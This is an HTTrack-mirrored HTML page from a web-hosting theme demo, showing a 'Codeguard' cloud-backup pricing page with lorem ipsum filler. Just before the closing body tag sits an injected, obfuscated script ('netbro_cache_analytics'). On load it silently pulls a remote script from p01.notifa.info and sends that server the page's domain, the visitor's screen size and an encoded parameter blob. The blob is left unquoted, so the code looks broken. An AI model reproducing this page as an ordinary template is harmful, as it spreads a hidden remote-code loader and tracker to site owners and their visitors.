<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from rctheme.com/demo-html/prohost/codeguard.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:25 GMT -->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<!-- Mobile Meta -->
<meta name="viewport" content="width=device-width, initial-scale=1">

<!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
<meta name="description" content="">
<meta name="author" content="">
<title>Website Backup - Codeguard</title>

<!-- Favicon -->
<link rel="icon" href="images/favicon.png">

<!-- Bootstrap core CSS -->
<link href="css/bootstrap.css" rel="stylesheet" media="all" />

<!-- Font Awesome CSS -->
<link rel="stylesheet" href="css/font-awesome.css" media="all" />

<!-- Main Template CSS -->
<link rel="stylesheet" href="css/style.css" media="all" />

<!-- Animation CSS -->
<link rel="stylesheet" href="css/animate.min.css" media="all" />
</head>

<body>
<!-- ========= Header Section Start ========= -->

<header>
  <div class="top_header">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link">
            <ul>
              <li>24x7 Live support</li>
              <li>+ 91 123 4567 890</li>
            </ul>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link right">
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="login.html">Login</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="main_menu">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-3 col-xs-12">
          <div class="logo"><a href="index-2.html"><img src="images/logo.png" alt="logo" title="logo" /></a></div>
        </div>
        <div class="col-md-9 col-sm-9 col-xs-12">
          <div class="navbar navbar-default" role="navigation">
            <div class="navbar-header">
              <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sronly">Menu</span> <i class="fa fa-bars" aria-hidden="true"></i></button>
            </div>
            <nav class="navbar navbar-default">
              <div id="navbar-collapse-1" class="collapse navbar-collapse">
                <ul class="nav navbar-nav">
                  <li><a href="index-2.html">Home</a></li>
                  <li><a href="#">Domain <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="register-domain.html">Register a Domain</a></li>
                      <li><a href="transfer-domain.html">Transfer Your Domain</a></li>
                      <li><a href="domain-price.html">Domain Price</a></li>
                      <li><a href="domain-promos.html">Domain Promos</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Hosting <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="shared-hosting.html">Shared Hosting</a></li>
                      <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
                      <li><a href="dedicated-servers.html">Dedicated Servers</a></li>
                      <li><a href="vps.html">VPS Servers</a></li>
                      <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
                      <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Email <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="business-email.html">Business Email</a></li>
                      <li><a href="cloud-business-email.html">Cloud Business Email</a></li>
                      <li><a href="microsoft-office-365.html">Microsoft Office 365</a></li>
                      <li><a href="google-apps.html">Google Apps</a></li>
                    </ul>
                  </li>
                  <li class="active"><a href="#">Security <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="ssl-security.html">SSL Security</a></li>
                      <li><a href="codeguard.html">Codeguard</a></li>
                    </ul>
                  </li>
                  <li><a href="bundled-offers.html">Bundle Offers</a></li>
                  <li><a href="support.html">Support</a></li>
                </ul>
              </div>
            </nav>
          </div>
        </div>
      </div>
    </div>
  </div>
</header>

<!-- ========= Header Section End ========= --> 

<!-- ========= Inner Page Banner Section Start ========= -->

<section class="inner_page_header">
  <div class="container">
    <div class="row">
      <div class="col-md-12">
        <div class="inner_headin_s"><i class="fa fa-cloud-upload" aria-hidden="true"></i>
          <h1>Cloud backup for your website</h1>
          <p>All websites—large & small—run the risk of crashes and data loss. CodeGuard's cloud backup lets you recover your website data instantly, with just a few clicks.</p>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Inner Page Banner Section End ========= --> 

<!-- ========= Prices Table Section Start ========= -->

<section class="price_table text_center">
  <div class="tabbable-panel">
    <div class="tabbable-line">
      <div class="container">
        <div class="row">
          <div class="col-md-12 col-sm-12 col-xs-12">
            <div class="headings black_text">
              <h6>Plan and Price</h6>
              <h3>Select a plan for your website</h3>
              <div class="sep black_bg"></div>
            </div>
          </div>
          <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".3s">
            <div class="plan_box">
              <div class="plan_header">
                <div class="heading">Basic</div>
                <div class="prices">$1.19<span>/month</span></div>
              </div>
              <div class="plan_middle">
                <ul>
                  <li><strong>1 GB </strong> Disk Space</li>
                  <li><strong>Up to 5 </strong> Websites</li>
                  <li><strong>Unlimited </strong> Databases</li>
                  <li><strong>5 Days </strong> Automatic Backup</li>
                </ul>
              </div>
              <div class="plan_footer">
                <select class="select_p">
                  <option selected="selected">5 years at $23.00/month</option>
                  <option>4 years at $23.00/month</option>
                  <option>3 years at $23.00/month</option>
                  <option>2 years at $23.00/month</option>
                  <option>1 years at $23.00/month</option>
                </select>
                <a class="secondry_button" href="#">Order Now</a></div>
            </div>
          </div>
          <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s">
            <div class="plan_box">
              <div class="plan_header">
                <div class="heading">Professional</div>
                <div class="prices">$3.46<span>/month</span></div>
              </div>
              <div class="plan_middle">
                <ul>
                  <li><strong>5 GB </strong> Disk Space</li>
                  <li><strong>Up to 10 </strong> Websites</li>
                  <li><strong>Unlimited </strong> Databases</li>
                  <li><strong>3 Days </strong> Automatic Backup</li>
                </ul>
              </div>
              <div class="plan_footer">
                <select class="select_p">
                  <option selected="selected">5 years at $29.00/month</option>
                  <option>4 years at $29.00/month</option>
                  <option>3 years at $29.00/month</option>
                  <option>2 years at $29.00/month</option>
                  <option>1 years at $29.00/month</option>
                </select>
                <a class="secondry_button" href="#">Order Now</a></div>
            </div>
          </div>
          <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
            <div class="plan_box">
              <div class="plan_header">
                <div class="heading">Premium</div>
                <div class="prices">$6.49<span>/month</span></div>
              </div>
              <div class="plan_middle">
                <ul>
                  <li><strong>10 GB </strong> Disk Space</li>
                  <li><strong>Up to 20 </strong> Websites</li>
                  <li><strong>Unlimited </strong> Databases</li>
                  <li><strong>Daily </strong> Automatic Backup</li>
                </ul>
              </div>
              <div class="plan_footer">
                <select class="select_p">
                  <option selected="selected">5 years at $38.00/month</option>
                  <option>4 years at $38.00/month</option>
                  <option>3 years at $38.00/month</option>
                  <option>2 years at $38.00/month</option>
                  <option>1 years at $38.00/month</option>
                </select>
                <a class="secondry_button" href="#">Order Now</a></div>
            </div>
          </div>
          <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".4s">
            <div class="plan_box">
              <div class="plan_header">
                <div class="heading">Enterprise</div>
                <div class="prices">$11.90<span>/month</span></div>
              </div>
              <div class="plan_middle">
                <ul>
                  <li><strong>15 GB </strong> Disk Space</li>
                  <li><strong>Up to 50 </strong> Websites</li>
                  <li><strong>Unlimited </strong> Databases</li>
                  <li><strong>Daily </strong> Automatic Backup</li>
                </ul>
              </div>
              <div class="plan_footer">
                <select class="select_p">
                  <option selected="selected">5 years at $38.00/month</option>
                  <option>4 years at $38.00/month</option>
                  <option>3 years at $38.00/month</option>
                  <option>2 years at $38.00/month</option>
                  <option>1 years at $38.00/month</option>
                </select>
                <a class="secondry_button" href="#">Order Now</a></div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Prices Table Section End ========= --> 

<!-- ========= What We Do Section Start ========= -->

<section class="what_we_do text_center white_text">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings white_text">
          <h6>Website backup</h6>
          <h3>that just works</h3>
          <div class="sep white_bg"></div>
        </div>
      </div>
      <div class="col-md-4 col-sm-4 col-xs-12 whatwedo wow fadeInUp" data-wow-duration=".3" data-wow-delay=".1s"><i class="fa fa-cloud-upload what-icon" aria-hidden="true"></i>
        <h5 class="section_sub_heading">Automatic backups</h5>
        <p>Lorem Ipsum is simply dummy text of theprinting and typesetting it has the randomised.</p>
      </div>
      <div class="col-md-4 col-sm-4 col-xs-12 whatwedo wow fadeInUp" data-wow-duration=".3" data-wow-delay=".3s"><i class="fa fa-code what-icon"></i>
        <h5 class="section_sub_heading">Hassle-free setup</h5>
        <p>Lorem Ipsum is simply dummy text of theprinting and typesetting it has the randomised.</p>
      </div>
      <div class="col-md-4 col-sm-4 col-xs-12 whatwedo wow fadeInUp" data-wow-duration=".3" data-wow-delay=".5s"><i class="fa fa-money what-icon" aria-hidden="true"></i>
        <h5 class="section_sub_heading">30-day Money-back guarantee</h5>
        <p>Lorem Ipsum is simply dummy text of theprinting and typesetting it has the randomised.</p>
      </div>
    </div>
  </div>
</section>

<!-- ========= What We Do Section End ========= --> 

<!-- ========= Why Choose Hosting Section Start ========= -->

<section class="text_center">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings black_text">
          <h6>Best Work</h6>
          <h3>How it works</h3>
          <div class="sep black_bg"></div>
        </div>
      </div>
      <div class="why_choose_hosting">
        <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".1s">
          <div class="hosting_box"><i class="fa fa-desktop" aria-hidden="true"></i>
            <h5 class="section_sub_heading">Connect your website</h5>
            <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          </div>
        </div>
        <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".3s">
          <div class="hosting_box"><i class="fa fa-cloud-download" aria-hidden="true"></i>
            <h5 class="section_sub_heading">Get regular backup updates</h5>
            <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          </div>
        </div>
        <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".5s">
          <div class="hosting_box"><i class="fa fa-cogs" aria-hidden="true"></i>
            <h5 class="section_sub_heading">Restore from any point</h5>
            <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Why Choose Hosting Section End ========= --> 

<!-- ========= Footer Section Start ========= -->

<footer class="footer">
  <div class="f_outr_section">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>About Us</h4>
            <div class="f_about">
              <p>Lorem ipsum dolor sit amet dolor sit elit Suspendisse et justo et justo sit Praesent mattis commodo augue Aliquam ornare. Lorem ipsum dolor sit amet dolor sit elit. Lorem ipsum dolor sit amet dolor sit elit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Quick Links</h4>
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="support.html">Support</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="bundled-offers.html">Bundle Offers</a></li>
              <li><a href="login.html">Login</a></li>
              <li><a href="404.html">404 Page</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Our Services</h4>
            <ul>
              <li><a href="shared-hosting.html">Shared Hosting</a></li>
              <li><a href="vps.html">Virtual Private Server</a></li>
              <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
              <li><a href="dedicated-servers.html">Dedicated Server</a></li>
              <li><a href="ssl-security.html">SSL Certificated</a></li>
              <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
              <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading ">
            <h4>Contact Us</h4>
            <div class="f_contact_s">
              <div class="f-con-head">Address:-
                <p>Lorem ipsum dolor<br>
                  amet dolor sit elit Suspendisse</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Contact:-
                <p>Ph: (+000) 1234 5678<br>
                  Fax: (+000) 1234 5678</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Email:-
                <p><a href="mailto:info@yourdomain.com">info@yourdomain.com</a><br>
                  <a href="mailto:sales@yourdomain.com">sales@yourdomain.com</a></p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="footer-bottom">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="news_letr">
            <form>
              <input type="text" placeholder="Enter your Email" class="nwesltr">
              <input type="submit" class="secondry_button join_now" value="Join Now">
            </form>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="social">
            <ul>
              <li><a href="#"><i class="fa fa-facebook"></i></a></li>
              <li><a href="#"><i class="fa fa-google"></i></a></li>
              <li><a href="#"><i class="fa fa-twitter"></i></a></li>
              <li><a href="#"><i class="fa fa-linkedin"></i></a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="copy-right">
    <div class="container">
      <div class="row">
        <div class="col-md-12 col-sm-12 col-xs-12">Copyright © 2015 - 2017 prohost. All Rights Reserved.</div>
      </div>
    </div>
  </div>
</footer>

<!-- ========= Footer Section End ========= --> 

<!-- Bootstrap core JavaScript --> 
<script type="text/javascript" src="js/jquery.min.js"></script> 
<script type="text/javascript" src="js/bootstrap.min.js"></script> 

<!-- Animation JavaScript --> 
<script type="text/javascript" src="js/jquery.wow.min.js" ></script> 
<script type="text/javascript" src="js/wow.min.js" ></script> 

<!-- Custom Template JavaScript --> 
<script type="text/javascript" src="js/custom.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m834VngSV4X4R0F0vE57ooPxBksglUzgLi5gbRVzga7E8jj%2bOpV8jSZJkKRi%2ftdZ1r5WrdvF7D6xz3I%2boeXtPk18jRhL7Y8PuGn1hUZqqvXVhGHRfqSkbQp5IHh0N2GiPfGsRuwD9Lr6%2b%2f4JLObrs6ooNu4RPJVsyq3jqhnET7GpQiFBvZhAPsaG5tZuuu45gx%2bVIRWA5bJhP5R%2f8SCVoSOCCZw9BQTVTjEGytXzVx3FfWExAcP31BMmljRgecV51vBa3qUGge8vclS6BvG3QO%2ffl4JZR6W%2bInPrmCLB05Z3wMWDwnI%2fjt%2b%2bvOhM9563ojfGPXf%2f26LF32M%2fp65%2fw%2fJH%2fWTCQcUblNLWpdwcdiyys80n2SoKz7UGipNwz%2b%2fDweMCWH5wi1oO3HP1yAdamblnu4MygTfhRFCA6GEA1gTC6957dldEbJilmkMfiwSUeqDFvEPsBsPWN5enpSTWNgSeOek4CcNL2LxZkDdNc8RGnlaemgBGkrQ%3d%3d + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from rctheme.com/demo-html/prohost/codeguard.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:25 GMT -->
</html>